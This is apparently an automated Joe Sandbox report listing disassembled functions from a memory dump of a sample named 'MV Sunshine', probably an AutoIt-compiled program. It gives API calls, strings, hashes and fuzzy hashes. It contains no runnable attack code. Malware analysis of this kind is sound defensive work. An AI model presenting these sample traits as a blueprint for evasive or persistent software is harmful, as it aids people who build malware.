Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: efc83b6fc46739871e646436b6b26dc2832e4ade0c9741e1f2d096f6302d48c7
Instruction ID: ce8991f193e0070bf4e639a9c2335f6d994e0849d78b4415a4247e2022642103
Opcode Fuzzy Hash: efc83b6fc46739871e646436b6b26dc2832e4ade0c9741e1f2d096f6302d48c7
Instruction Fuzzy Hash: 76418465C2052876CB90FBB5C886ACF73AAAF05310F60855AF519E3221FB34E715C7AD

Function 0067DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0067DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0067DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0067DB8E

Strings

DllGetClassObject, xrefs: 0067DB01
,,k, xrefs: 0067DA69

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,k$DllGetClassObject
API String ID: 753597075-913296791
Opcode ID: 1d8bfbd24a7ba504e6871081ac83b99501cab7653230ce1ff27d10d06106bf97
Instruction ID: 2b1d8638c1d8a9604943462cfe2ea5bc5875a587ccbada547dede363979c3f12
Opcode Fuzzy Hash: 1d8bfbd24a7ba504e6871081ac83b99501cab7653230ce1ff27d10d06106bf97
Instruction Fuzzy Hash: 44418FB1600209EFDB15DF54C884A9A7BBAEF48710F15C9AEED099F205D7B1DD44CBA0

Function 006838AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006838D3,?), ref: 006848C7

Part of subcall function 006848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006838D3,?), ref: 006848E0

lstrcmpiW.KERNEL32(?,?), ref: 006838F3
_wcscmp.LIBCMT ref: 0068390F
MoveFileW.KERNEL32(?,?), ref: 00683927
_wcscat.LIBCMT ref: 0068396F
SHFileOperationW.SHELL32(?), ref: 006839DB

Strings

\*.*, xrefs: 00683969

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a95d83217fd2ddc8a92bd04b10c1d84e7cb3cf7916aff8eaa3cfcf0098adabae
Instruction ID: 06123211bd8c9b3bfbd60706f1a3cb76c24c9c213f586fa325d63421dddfba2e
Opcode Fuzzy Hash: a95d83217fd2ddc8a92bd04b10c1d84e7cb3cf7916aff8eaa3cfcf0098adabae
Instruction Fuzzy Hash: 034180B140C3459ACB91FF64C481AEFB7EDAF89740F401A2EF48AC3251EA74D648CB56

Function 006A7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006A75C0
IsMenu.USER32(?), ref: 006A75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006A7620
DrawMenuBar.USER32 ref: 006A7633

Strings

0, xrefs: 006A750D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 345672836e4ad3d1acd077a36892f0e0b1617fa0093ffeb5f4262e6416f5ed76
Instruction ID: 8959b15fa9472278e0c270be0c3777f4559bdb73d897f5d4667075fcd872d63b
Opcode Fuzzy Hash: 345672836e4ad3d1acd077a36892f0e0b1617fa0093ffeb5f4262e6416f5ed76
Instruction Fuzzy Hash: 01411575A04609AFDB20EF94D884ADABBFAFB0A350F049129F9559B350D730ED51CFA0

Function 006A122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006A125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A1286
FreeLibrary.KERNEL32(00000000), ref: 006A133D

Part of subcall function 006A122D: RegCloseKey.ADVAPI32(?), ref: 006A12A3
Part of subcall function 006A122D: FreeLibrary.KERNEL32(?), ref: 006A12F5
Part of subcall function 006A122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006A1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 006A12E0

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: d66857ed24df0b4a4089c939feb826e65e59431f862569dcaeb26f10655cadc1
Instruction ID: 8edbabb430940d1b818e585f1da7b585a548c26e3c7825d28fd0fa1047635faa
Opcode Fuzzy Hash: d66857ed24df0b4a4089c939feb826e65e59431f862569dcaeb26f10655cadc1
Instruction Fuzzy Hash: 41311C71901109BFDB14AFD0DC89AFEB7BDEF0A300F0001AAE501E6251DA74AF859EA5

Function 006A653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006A655B
GetWindowLongW.USER32(00BD4B10,000000F0), ref: 006A658E
GetWindowLongW.USER32(00BD4B10,000000F0), ref: 006A65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006A65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006A661F
GetWindowLongW.USER32(00000000,000000F0), ref: 006A6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006A664A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 2e5e6d12374f4c93581d8b6f264a8ec067330731d391ad1039b23e0925f349d0
Instruction ID: dcea8dc9ddda82a0b2fbd12923027b93c8b4ad01454c0e13dee733224df40388
Opcode Fuzzy Hash: 2e5e6d12374f4c93581d8b6f264a8ec067330731d391ad1039b23e0925f349d0
Instruction Fuzzy Hash: A331F330A44250AFDB21EF58DC89F9537E2FB5A750F1921A8F5118F2B6CB61AC40DF62

Function 00696486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006980CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006964D9
WSAGetLastError.WSOCK32(00000000), ref: 006964E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00696521
connect.WSOCK32(00000000,?,00000010), ref: 0069652A
WSAGetLastError.WSOCK32 ref: 00696534
closesocket.WSOCK32(00000000), ref: 0069655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00696576

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 3d835ef24499890bd057cbb2c3533d18d3c0b9186c5ecf144feab519c84d7913
Instruction ID: 3aa5c502655c5177a4fdc0b52c05696bcde45333f435ed4b679f951177beca2e
Opcode Fuzzy Hash: 3d835ef24499890bd057cbb2c3533d18d3c0b9186c5ecf144feab519c84d7913
Instruction Fuzzy Hash: 69318131600218AFDF10AF64DC85BBE7BBEEB45724F048069F90997291DB74AD45CF62

Function 0067E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067E120
SysAllocString.OLEAUT32(00000000), ref: 0067E123
SysAllocString.OLEAUT32 ref: 0067E144
SysFreeString.OLEAUT32 ref: 0067E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0067E167
SysAllocString.OLEAUT32(?), ref: 0067E175

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b6786e55b7d9bd25f3dde500f6d8e88be9ca4ca187d52978f9c3152681014e48
Instruction ID: 7f627a2bbd774ad760668de65dcd86ba6077292e475e15dc055800b352e62a02
Opcode Fuzzy Hash: b6786e55b7d9bd25f3dde500f6d8e88be9ca4ca187d52978f9c3152681014e48
Instruction Fuzzy Hash: B9217135604108AFDB10AFB8DC89CAB77EEEB0D760B50C175F919CB261DA71EC858B64

Function 0067FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0067FB81
__wcsnicmp.LIBCMT ref: 0067FBA2
__wcsnicmp.LIBCMT ref: 0067FBBC

Strings

#requireadmin, xrefs: 0067FB9C
#notrayicon, xrefs: 0067FB79
#OnAutoItStartRegister, xrefs: 0067FBB6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 954f968bdffd16bf53bfa84c70cb9347ec09df86139f4c450ff4795dac4a1884
Instruction ID: 0d9e312de0b29a9eba49d5b49f57bebcf554683f62ffa7510109281bcf348e17
Opcode Fuzzy Hash: 954f968bdffd16bf53bfa84c70cb9347ec09df86139f4c450ff4795dac4a1884
Instruction Fuzzy Hash: 5F213772104565E6D331E734DC22EE773DBEF61740F14C439F88986281EB51A9D2D299

Function 006A783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006A78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006A78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006A78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006A78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006A78D4

Strings

Msctls_Progress32, xrefs: 006A7872

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9e25dada237ffbd0c7aa9ab17b5a1c8f2c272753a5eb8673772a2760a6ded2ca
Instruction ID: db0e83b9409401c4026df9cf49635e3b3227478e61427cc27019eb65c8208baf
Opcode Fuzzy Hash: 9e25dada237ffbd0c7aa9ab17b5a1c8f2c272753a5eb8673772a2760a6ded2ca
Instruction Fuzzy Hash: 6C1190B2510219BFEF159F60CC85EE77F6EEF097A8F015125BA04A6190C772AC21DFA4

Function 006441C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00644292,?), ref: 006441E3
GetProcAddress.KERNEL32(00000000), ref: 006441EA
EncodePointer.KERNEL32(00000000), ref: 006441F6
DecodePointer.KERNEL32(00000001,00644292,?), ref: 00644213

Strings

RoInitialize, xrefs: 006441D2
combase.dll, xrefs: 006441DE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 1454817ae456687d1c79af4bc3c35c625d8f96d1184b12dbe1f70ecd506275f3
Instruction ID: 7039b0d520b0cbd0b1fc51b7c5ca2e7faee75508792ed64dead99c0bcdc49e74
Opcode Fuzzy Hash: 1454817ae456687d1c79af4bc3c35c625d8f96d1184b12dbe1f70ecd506275f3
Instruction Fuzzy Hash: 27E01AB0A90341AEEF207BF0EC89BA53AE7BB62703F106824F511D91A0DFB554D59F01

Function 0064429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006441B8), ref: 006442B8
GetProcAddress.KERNEL32(00000000), ref: 006442BF
EncodePointer.KERNEL32(00000000), ref: 006442CA
DecodePointer.KERNEL32(006441B8), ref: 006442E5

Strings

RoUninitialize, xrefs: 006442A7
combase.dll, xrefs: 006442B3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 6f5ca48d667b281159d43157b09f39274737c48c4b88bff152e42aa3cf1fc390
Instruction ID: a55ced1fb48784c8906d0150d364aaf6e275f12a8a46773170e08b40f6bc02fe
Opcode Fuzzy Hash: 6f5ca48d667b281159d43157b09f39274737c48c4b88bff152e42aa3cf1fc390
Instruction Fuzzy Hash: 97E0B6B8691341AFEF10ABB1EC8DB963AA7BB25742F106428F001E95A0CFB45684DF15

Function 0068675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006868AD
_memmove.LIBCMT ref: 006867E8

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

_memmove.LIBCMT ref: 0068685B
_memmove.LIBCMT ref: 00686942
_memmove.LIBCMT ref: 0068695B
_memmove.LIBCMT ref: 00686977

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: f6e37033759929decb2087947801ab21ceb05d87debeb2e0ea76df718db484de
Instruction ID: d0b1cb9785fa474571f9191ee5aa3de8d32b6a94bd51737f39667715d59c9254
Opcode Fuzzy Hash: f6e37033759929decb2087947801ab21ceb05d87debeb2e0ea76df718db484de
Instruction Fuzzy Hash: 0461BE30500A6A9BDF51FF20DC82EFE37A6AF45708F04461DF95A5B292DB309D85CBA4

Function 006A046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 006A10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006A0038,?,?), ref: 006A10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006A05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006A05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006A0617
RegCloseKey.ADVAPI32(00000000), ref: 006A0624

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: c3cb809e8a056a869ab060cfc9f26741af353bfedb375ea293f28cba566e2330
Instruction ID: a76d197c19b7c8126afd276d1849dee6fbd612bb126e516e19e2d0a0530ba497
Opcode Fuzzy Hash: c3cb809e8a056a869ab060cfc9f26741af353bfedb375ea293f28cba566e2330
Instruction Fuzzy Hash: 3C515831508200AFDB54EF64D885E6BBBEAFF8A314F04891DF585872A1DB31E905CF56

Function 006A5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006A5A82
GetMenuItemCount.USER32(00000000), ref: 006A5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006A5AE1
GetMenuItemID.USER32(?,?), ref: 006A5B50
GetSubMenu.USER32(?,?), ref: 006A5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 006A5BAF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 62ddfb2123c0cd94bba172e970bfb0f8dd419ab5624257f4f76e353e3feceff0
Instruction ID: 9befe1ac38df43ebb7429f8fbe987a2971527de6e307af6497e4dd68a9693761
Opcode Fuzzy Hash: 62ddfb2123c0cd94bba172e970bfb0f8dd419ab5624257f4f76e353e3feceff0
Instruction Fuzzy Hash: F8518F31E00A25EFCB11EFA4C855AAEB7B6EF49310F104469F906B7351CB70AE418F95

Function 0067F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067F3F7
VariantClear.OLEAUT32(00000013), ref: 0067F469
VariantClear.OLEAUT32(00000000), ref: 0067F4C4
_memmove.LIBCMT ref: 0067F4EE
VariantClear.OLEAUT32(?), ref: 0067F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0067F569

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 5da805b5fd1734d74b65eae3ed7a2e43f72fcf7ddfe3b1662edc14a629fa9785
Instruction ID: 4105179251578f21e1261ec39122c2e0e5c36a08f2814a323fdfc3b13cda906f
Opcode Fuzzy Hash: 5da805b5fd1734d74b65eae3ed7a2e43f72fcf7ddfe3b1662edc14a629fa9785
Instruction Fuzzy Hash: 205146B5A00209AFDB10DF68D880EAAB7F9FF4D354B158569E959DB301D730E912CFA0

Function 006826F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00682792
IsMenu.USER32(00000000), ref: 006827B2
CreatePopupMenu.USER32 ref: 006827E6
GetMenuItemCount.USER32(000000FF), ref: 00682844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00682875

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
